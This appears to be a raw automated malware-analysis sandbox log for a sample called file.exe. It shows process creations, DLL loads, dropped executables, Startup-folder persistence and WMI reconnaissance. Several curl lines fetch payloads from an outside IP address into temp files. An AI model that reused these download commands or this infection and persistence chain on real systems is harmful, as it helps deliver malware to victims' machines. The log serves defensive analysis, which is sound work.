Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: version.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1245183 > 1048576
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C.pdb source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, nircmdc.exe.52.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
Source: 7zxa.dll.52.dr Static PE information: real checksum: 0x0 should be: 0x316b6
Source: 7za.dll.52.dr Static PE information: real checksum: 0x0 should be: 0x4352d
Source: zip.exe.52.dr Static PE information: real checksum: 0x0 should be: 0x30da3
Source: nircmdc.exe.52.dr Static PE information: real checksum: 0x0 should be: 0x157f0
Source: file.exe Static PE information: real checksum: 0x138e94 should be: 0x139977
Source: 7za.exe.52.dr Static PE information: real checksum: 0x0 should be: 0xae01b
Source: 7zxa.dll.52.dr Static PE information: section name: .sxdata
Source: 7za.dll.52.dr Static PE information: section name: .sxdata
Source: 7za.exe.52.dr Static PE information: section name: .sxdata
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0041B280 push eax; ret 52_2_0041B2AE
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_3_007F990C push ebp; iretd 88_3_007F990D
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_3_0080E110 push ds; iretd 88_3_0080E122
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_3_0080C340 push eax; ret 88_3_0080C341
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_3_007FC7AC push ebp; iretd 88_3_007FC7AD
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_3_0080C364 push eax; ret 88_3_0080C365
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\768032\Finish.com
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\303482\Either.pif
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\zip.exe
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\7za.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Rocky
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\303482\Either.pif Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe File created: C:\Users\user\AppData\Roaming\DolphinDumps\7za.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Rocky Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\zip.exe
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7za.dll
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\303482\Either.pif
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exe
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dll
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exe
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7za.exe
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com TID: 2128 Thread sleep time: -16380000s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0041C29C FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose, 52_2_0041C29C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_004107A0 FindFirstFileA, 52_2_004107A0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_004062D5 FindFirstFileW,FindClose, 88_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00402E18 FindFirstFileW, 88_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 88_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\768032
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
